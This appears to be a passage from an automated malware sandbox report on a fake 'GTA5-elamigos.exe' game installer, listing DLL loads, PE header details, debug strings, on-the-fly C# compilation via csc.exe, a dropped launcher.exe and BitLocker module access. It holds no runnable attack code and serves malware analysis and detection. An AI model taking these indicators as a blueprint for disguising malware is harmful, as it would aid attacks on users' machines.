Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: GTA5-elamigos.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: GTA5-elamigos.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: GTA5-elamigos.exe

Static file information: File size 34434422 > 1048576

Source: GTA5-elamigos.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x155e800
Source: GTA5-elamigos.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x9fb200

Source: GTA5-elamigos.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: GTA5-elamigos.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: GTA5-elamigos.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: GTA5-elamigos.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: GTA5-elamigos.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: GTA5-elamigos.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: GTA5-elamigos.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: GTA5-elamigos.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb[ source: powershell.exe, 00000003.00000002.2174426754.000001B01F900000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\deno\deno\target\release\deps\deno.pdb source: GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D91E000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: \user\AppData\Local\Temp\14ynqbdy\14ynqbdy.pdbneAutomation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dllmands.Utility.dll source: powershell.exe, 00000003.00000002.2156864943.000001B007620000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb$Sb# source: powershell.exe, 00000007.00000002.2347659213.000001DADA187000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\jmxyvs0r\jmxyvs0r.pdb source: powershell.exe, 00000007.00000002.2294693432.000001DAC3306000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb4 source: powershell.exe, 00000003.00000002.2174426754.000001B01F900000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdbp; source: powershell.exe, 00000007.00000002.2347659213.000001DADA187000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\jmxyvs0r\jmxyvs0r.pdbhP source: powershell.exe, 00000007.00000002.2294693432.000001DAC3306000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbm source: powershell.exe, 00000003.00000002.2174426754.000001B01F900000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2346608617.000001DAD9F4C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2347850924.000001DADA1BC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ion.pdb source: powershell.exe, 00000007.00000002.2347490994.000001DADA170000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: embly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.2174426754.000001B01F900000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.pdb source: powershell.exe, 00000003.00000002.2157122606.000001B008E0A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.pdbhP source: powershell.exe, 00000003.00000002.2157122606.000001B008E0A000.00000004.00000800.00020000.00000000.sdmp

Source: GTA5-elamigos.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: GTA5-elamigos.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: GTA5-elamigos.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: GTA5-elamigos.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: GTA5-elamigos.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jmxyvs0r\jmxyvs0r.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jmxyvs0r\jmxyvs0r.cmdline"

Source: GTA5-elamigos.exe	Static PE information: section name: _RDATA
Source: launcher.exe.13.dr	Static PE information: section name: .eh_fram
Source: launcher.exe.13.dr	Static PE information: section name: .xdata

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF848F2370A push eax; ret		3_2_00007FF848F23711
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF848FF0E39 push eax; iretd		3_2_00007FF848FF0E41

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\jmxyvs0r\jmxyvs0r.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\WindowsTasks\Platform\App-rRrqar5TwQ\launcher.exe	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\WindowsTasks\Platform\App-rRrqar5TwQ\launcher.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
